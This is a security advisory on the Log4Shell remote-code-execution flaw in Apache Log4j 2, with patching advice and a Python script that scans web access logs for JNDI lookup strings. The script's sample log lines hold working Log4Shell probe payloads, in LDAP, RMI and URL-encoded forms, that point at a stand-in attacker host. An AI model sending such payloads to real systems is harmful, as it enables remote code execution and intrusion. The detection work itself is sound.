Apache Log4j 2 Vulnerability - Log4Shell

The K logix Testing Services team wanted to share that a critical vulnerability has been discovered in Apache Log4j 2, an open source Java package used to enable logging in many popular applications, and it can be exploited to enable remote code execution on countless servers. The Apache Software Foundation (ASF) has identified the vulnerability as CVE-2021-44228 and it has been dubbed Log4Shell. ASF says Log4Shell receives the maximum severity rating, 10, on the Common Vulnerability Scoring System (CVSS) scale. (PCMag)

Here are a few references:

https://github.com/lunasec-io/lunasec/blob/master/docs/blog/2021-12-09-log4j-zero-day.md

https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit

https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/

If you are using in-house or third-party developed Java-based applications that use vulnerable versions of Log4j, you may want to look into patching. Apple iCloud was affected, as were many other service providers. The vulnerability can be triggered by any application that logs untrusted or unsanitized data. Depending on the application, the trigger can lie in unauthenticated portions of the application that simply log web requests or authentication attempts, or in any logging activity that passes that data through the vulnerable lookup directives, which cause the application to attempt to communicate with a malicious LDAP server.
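One way to check whether attacker-controlled request fields reaching your logs carry the Log4j JNDI lookup string is to scan web access logs for it. The script below is an added example, not part of the K logix advisory; the access-log lines and the `attacker.example` hostnames in them are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in the Apache/nginx "combined" format.
# Line 1 is benign; lines 2-4 carry a JNDI lookup in a user-controlled field
# (request line, User-Agent, and a URL-encoded request line respectively).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET /api/health HTTP/1.1" 200 40 "-" "${JNDI:rmi://attacker.example/b}"
203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 200 40 "-" "curl/7.79.1"
"""

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Log4j lookup syntax is ${prefix:...}; the JNDI prefix is the one that
# makes a vulnerable Log4j 2 contact a remote LDAP/RMI server (CVE-2021-44228).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Fields an unauthenticated client fully controls and that apps commonly log.
UNTRUSTED_FIELDS = ("request", "referer", "ua")


def scan_log(text):
    """Return one finding per log line whose untrusted fields contain a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = COMBINED.match(line)
        if not m:
            continue  # unparseable line; a production tool should count these
        for field in UNTRUSTED_FIELDS:
            value = unquote(m.group(field))  # decode %xx so encoded probes are seen
            if JNDI_LOOKUP.search(value):
                findings.append({"line": lineno, "src_ip": m.group("ip"),
                                 "field": field, "value": value})
                break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src_ip']} via {f['field']}: {f['value']}")
```

A hit means a lookup string reached a logged field, not that exploitation succeeded; treat it as a prompt to confirm the Log4j version in use and to patch.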

If you have any questions or concerns please don’t hesitate to reach out to us.
